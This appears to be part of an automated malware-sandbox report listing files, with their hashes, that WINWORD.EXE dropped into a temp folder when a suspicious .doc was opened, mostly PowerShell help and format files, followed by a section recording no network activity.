SHA256: abf5e9060b66b5a498cd735d8243a5111a2f37c82c326dd375c0bb5cd21627ef
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_History.help.txt
text
MD5: 5247459f303b12b74cf35c88ba7679f0
SHA256: 5075e80ec46ab03b51a041de1ef88bced94aff35791c4810cdded71661863ca3
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_If.help.txt
text
MD5: 5ed2ac359cca7cc708694b6a676384a0
SHA256: 3ad7fd0279f054e1992415f47e6e16b147485ab82bad6038f05aff5f2c5605b9
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_Line_Editing.help.txt
text
MD5: 990713f37dcc0aa688f78f4fbdb2b86c
SHA256: 668d5e7e4ed0e9551e9415bbc623e20955affaecf263360d0f1c77f1e8c180f2
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_objects.help.txt
text
MD5: eb466f74dbd492ac5e4e642151b29e13
SHA256: ecc728797338a52970872f9795128f7d2e1142cd42f4e67a28e27267b4b098e8
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_job_details.help.txt
text
MD5: 2300489f3d24d182e0134470cce76158
SHA256: cad0edabb7a3b710c9df4bb2be03db8beaacb6527c26d9787d6f72d0a30f26dd
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_logical_operators.help.txt
text
MD5: 8f9bc2797b95d1456a705b69819a828b
SHA256: 36ccd7847b33fa23d84da4a7e3d98821dc119c91534f5d1e53f9db6005fba41a
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_Core_Commands.help.txt
text
MD5: 9ddd0d75db8b8d52e1bd4474ed24582f
SHA256: a7743fc735a6887cb51a51fb26e57fd0ed858cbae9844242b49a6c80d7afa45c
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_functions_advanced_parameters.help.txt
text
MD5: dd3a21a98a0c62745e9a09f165d24676
SHA256: 7380ce7bb8e9b3e87ba91b25cca7d47aed75846bf62faae4efffdf6e816fdae6
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_data_sections.help.txt
text
MD5: 4749443816fde8b533b18b8e80a86f53
SHA256: cbb6bde551361f88226276c8135102ba712dd50225a90cf0bf57cee0dbf9a758
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_eventlogs.help.txt
text
MD5: 59c7512b5261ac5d0a02fcc3e6fd077c
SHA256: c5999028e774c6535b17ada9893d684278810dfd8da82d60e3b812d22be09256
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_Foreach.help.txt
text
MD5: a012634c19a188800968ece8a2a74385
SHA256: ba65881c4b99034c7319c40e4145dd22872e8acc6b6f886eb95de4b252324caf
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_format.ps1xml.help.txt
text
MD5: ebf6b26a926e6e9cd418b507698e0af3
SHA256: 52a7f15822fefa602bd7b125de0ea03becaa4e5c8bdd0346f849c688667abca1
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_functions.help.txt
text
MD5: 7b29ab9dcf5e59eb86f8c030b395af79
SHA256: 5bf2e0c2b3d8f44385dab3edddcf39527f3cadf162358919362fa41abe147865
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_functions_advanced.help.txt
text
MD5: 5b4ae14fe4ff47bf87e7b768dc46ce03
SHA256: 5306ebfdf7918c8bd9100a1e840662d33b0109f8e0ef852d23c3c17467e7f88d
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_escape_characters.help.txt
text
MD5: ba3da2ae40d346973a66ff105ca7cef3
SHA256: 19bd5c33a0c354716df01a651195c552696b4b62ec745661789fc36644e5e15d
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_functions_cmdletbindingattribute.help.txt
text
MD5: 0aa24c2ac8720c212bd2f73b100ab4e8
SHA256: f6a22568067c8eface6e0597c43374af3506ba73173a6e3daf2ba495dbc950de
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_functions_advanced_methods.help.txt
text
MD5: 68ab90b7dab1a5f9b37c469c72e84096
SHA256: d6f7acf2d9741613094c09f956cbb2f82bd89318223095829faab40d4d476eec
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_environment_variables.help.txt
text
MD5: 592117f8ddd831da25bebe6e2fc58eb2
SHA256: 447081fbed7cc935ef69613592032f75da4d002c9948e16c4f9f628e4c880ee4
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_do.help.txt
text
MD5: 490344bc575a1f2fe43aa0785b20cbe1
SHA256: 18eff25c341bd276707758467b5a2279b1f1fe43703786505803434586c8d134
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_hash_tables.help.txt
text
MD5: 8b6304c033642b3864f52c9772a95950
SHA256: 402b062fb414c3389b6fc02b7c052efed071ee90df609613d00c7d3cd37d86ba
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_For.help.txt
text
MD5: 18cc7f5e7435194b0dad8ee8dd3a1793
SHA256: 7366e7ca7cb79bb18c18a8f408840cfc0a84ce9ed915001376a0e6f716edfeb9
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_debuggers.help.txt
text
MD5: dd41e5d943f66bc0ce48eeb0376a398e
SHA256: be9f4b6ba21efb0f13cb47a0f90fe8c23b36ae56c433ecb460f354144ab18b84
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_execution_policies.help.txt
text
MD5: f82cde32b45bea260dfcefb28c72ce9e
SHA256: a261adbb9aae03c76d0678dda45997ea0d97b24b04ba3f17f9f56963903aa7b2
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_Command_Syntax.help.txt
text
MD5: 847b0c3a6010660492ecc1d88a69210d
SHA256: 7d7ee4469ae76392317dc7e16e716b5767bd7eefcdc39f60c51ed1da2e99ae2b
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\Diagnostics.Format.ps1xml
text
MD5: ff6eeb8125b9265c5ba40af9f7c6f6bc
SHA256: 7d569c1155cfa9b7bb2ba225ee409a55c8b0e8217f3a7e05baa39da1bd7c4689
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_command_precedence.help.txt
text
MD5: 9b204318b2747400638fe5028e376100
SHA256: a79d0811c03feb6129802426f53799cba1a93c4bd204ce33e55bc180d3f0f132
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_CommonParameters.help.txt
text
MD5: bd04b34656edf637080e5b39ac179450
SHA256: 5aa4d407219915fb2f87fac21e309e9933cc98b6394a3b3d4873f5c139c48da1
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\Certificate.format.ps1xml
xml
MD5: c93a361112351b30e2c959e72789952d
SHA256: 4379bd59c1328a6811584d424df3dc193a5d607e2859d3ac1655b9124a5f100d
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_Break.help.txt
text
MD5: aedbfc39660ae3e030761ed4782ce328
SHA256: 13231768182599ec2c15b281f5e313e36428327479da7f05ff8a92c5479214f2
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\DotNetTypes.format.ps1xml
xml
MD5: 1ab2fd4b6749ad6831c86411fdcafb48
SHA256: 98540086cfc986d7604ffded977ef20944d1715bf8453809ce736c919cb6e1ef
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_Assignment_Operators.help.txt
text
MD5: d2dd0c7c3423cdc0040b68fbc475428e
SHA256: 4da2f663032a15d4ecb7a6fcb6df8d5c07d097ed8d3fa9ec054d676584c4b411
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_Comparison_Operators.help.txt
text
MD5: 409ed6be5314bac97afc88aca11725a8
SHA256: 613eba45d12113b49d942ff9cfc939f0f5c8cabb819b5b3bd47b7a4f9e719d48
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_Arithmetic_Operators.help.txt
text
MD5: 04d0cdc53b434b3fe0022831c9d06a84
SHA256: d42c3639dc7e4816800b1221e74f682bc3e6c8f34d00cc4765b3adebc173bbba
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\PowerShellTrace.format.ps1xml
xml
MD5: 134a65f6be32e46342b5e514937b0b49
SHA256: e0cca802af6b0081a1615a1249461bc56227a1f86e98311999a1c96e1b47c5e9
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_Automatic_Variables.help.txt
text
MD5: 96a664e1a1ee05b3a0c24d3187f9a1a9
SHA256: f6f0ce7433667264eb7483b8c5ef62bec39cc4f3e7d24378471af28cd458fed7
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_Continue.help.txt
text
MD5: 2775518b0c0896a3b88c7ea577acffc3
SHA256: dae6b448ee1a5696ad66f43a053dba37f6c20f0fe1008ce35f4fdf440b0f4100
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_arrays.help.txt
text
MD5: 04bb4aa2cf5a5d3ead1d9f6eea89c034
SHA256: 0c058df25203e39d339f127c0ae8235ee3e2e77f33b57f894e8e5a4ae6243ec8
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_Comment_Based_Help.help.txt
text
MD5: 8d7e5ad25683e71cd1dfe4949a754bc5
SHA256: a653702f520d12525099f8c7ff70a92d812c3dd3965d2d4953c2fa6840916ecd
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_aliases.help.txt
text
MD5: dccde3d3fa7a378dab091d3b78e393cb
SHA256: 5dd570caa907247bac82b722b453619adc88063c238b294154939481c134b140
2372
WINWORD.EXE
C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\e32940c52aed3b787267f4b8d528af97108b46f5254578cbaab20768d98f589e.doc.LNK
lnk
MD5: 1646f6f20d0cfc75416a644f97532017
SHA256: b32ebc7d5cf76df0c0a167bee162b7523fc4cf2fddf30744486c5869f2072e60
2372
WINWORD.EXE
C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat
text
MD5: c602dfe9823e722f2f602f33a37cbb13
SHA256: b9f85015219ca33c2616875f9802dcede0301fbd50f4336f285fcb9712451de2
2372
WINWORD.EXE
C:\Users\admin\Desktop\~$2940c52aed3b787267f4b8d528af97108b46f5254578cbaab20768d98f589e.doc
pgc
MD5: adeb6243cb5fad24cf9d150ec6aa3e0d
SHA256: 0b567364b7ea4a3e8846d6d723ece32dd8d14c1cf9893af84900686d538ff0fb
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\Modules\PSDiagnostics\PSDiagnostics.psd1
text
MD5: 6c7ab4f2165404cfc34a925289f03c9a
SHA256: c5a5a93cb0e2ca88d267ecd74ae10798d7a8058cf517732687e31b9b4939d612

Find more information about the static content and download it in the full report

Network activity

HTTP(S) requests
0
TCP/UDP connections
0
DNS requests
0
Threats
0

No network activity.

Debug output strings

No debug info.